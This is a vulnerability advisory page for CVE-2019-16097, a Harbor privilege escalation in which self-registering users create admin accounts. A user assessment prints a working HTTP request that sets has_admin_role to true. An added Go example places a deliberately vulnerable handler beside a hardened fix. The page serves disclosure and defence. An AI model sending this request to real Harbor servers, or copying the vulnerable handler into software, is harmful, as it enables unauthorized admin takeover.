core/api/user.go in Harbor 1.7.0 through 1.8.2 allows non-admin users to create admin accounts via the POST /api/users API when Harbor is set up with the DB as its authentication backend and allows users to self-register. Fixed versions: v1.7.6, v1.8.3, v1.9.0. Workaround without applying the fix: configure Harbor to use a non-DB authentication backend such as LDAP.
Recent assessments:
kevthehermit on April 23, 2020 at 8:52pm UTC reported:
There are three specific requirements for an application to be vulnerable:
Vulnerable version!
Using a Database for storage
Self Registration enabled.
Self-registration is not a very common setting but it has been seen.
If you are able to register your own account it is trivial to modify a POST request and elevate yourself to admin permissions.
POST /api/users HTTP/1.1
Host: 10.102.7.190
Content-Type: application/json
Content-Length: 95
Connection: close
{"username":"Tom","email":"[email protected]","realname":"Tom","password":"Password1","comment":null, "has_admin_role":"true"}
If you have access to the repository as an admin you can manipulate the containers and even gain further access into the network if you can read and/or modify any of the containers or their secrets.
Assessed Attacker Value: 5
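The mistake described in the CVE text and shown by the request above, as an added Go example that is not Harbor's code: a self-registration handler that trusts a client-supplied has_admin_role flag, beside one that honours the flag only from an authenticated system administrator and rejects every other attempt so the attempt is visible. The UserReq and Caller types, the handler names and the sample body are assumptions constructed for this example.

```go
package main

import (
	"encoding/json"
	"errors"
	"fmt"
)

// UserReq models the JSON body of a user-creation request. Field names follow
// the request shown above; the type itself is constructed for this example.
type UserReq struct {
	Username     string `json:"username"`
	Email        string `json:"email"`
	Password     string `json:"password"`
	HasAdminRole bool   `json:"has_admin_role"`
}

// Caller describes who issues the request. A self-registering client is
// unauthenticated; only an authenticated system admin may grant admin.
type Caller struct {
	Authenticated bool
	IsSysAdmin    bool
}

var ErrForbidden = errors.New("only a system administrator may set has_admin_role")

// createUserVulnerable copies has_admin_role straight from the client body,
// which is the class of bug the advisory describes.
func createUserVulnerable(body []byte) (UserReq, error) {
	var u UserReq
	err := json.Unmarshal(body, &u)
	return u, err
}

// createUserHardened decodes the same body but refuses to create the user when
// a non-admin caller asks for the admin role. Silently clearing the flag is the
// other common fix; rejecting makes the attempt show up in logs.
func createUserHardened(c Caller, body []byte) (UserReq, error) {
	var u UserReq
	if err := json.Unmarshal(body, &u); err != nil {
		return UserReq{}, err
	}
	if u.HasAdminRole && !(c.Authenticated && c.IsSysAdmin) {
		return UserReq{}, ErrForbidden
	}
	return u, nil
}

// sampleBody is a constructed self-registration request asking for admin.
const sampleBody = `{"username":"tom","email":"tom@example.test","password":"Password1","has_admin_role":true}`

func main() {
	u, _ := createUserVulnerable([]byte(sampleBody))
	fmt.Println("vulnerable handler granted admin:", u.HasAdminRole)
	_, err := createUserHardened(Caller{}, []byte(sampleBody))
	fmt.Println("hardened handler, self-registration:", err)
}
```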
www.vmware.com/security/advisories/VMSA-2019-0015.html
cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16097
github.com/goharbor/harbor/commit/b6db8a8a106259ec9a2c48be8a380cb3b37cf517
github.com/goharbor/harbor/compare/v1.8.2...v1.9.0-rc1
github.com/goharbor/harbor/releases/tag/v1.7.6
github.com/goharbor/harbor/releases/tag/v1.8.3
unit42.paloaltonetworks.com/critical-vulnerability-in-harbor-enables-privilege-escalation-from-zero-to-admin-cve-2019-16097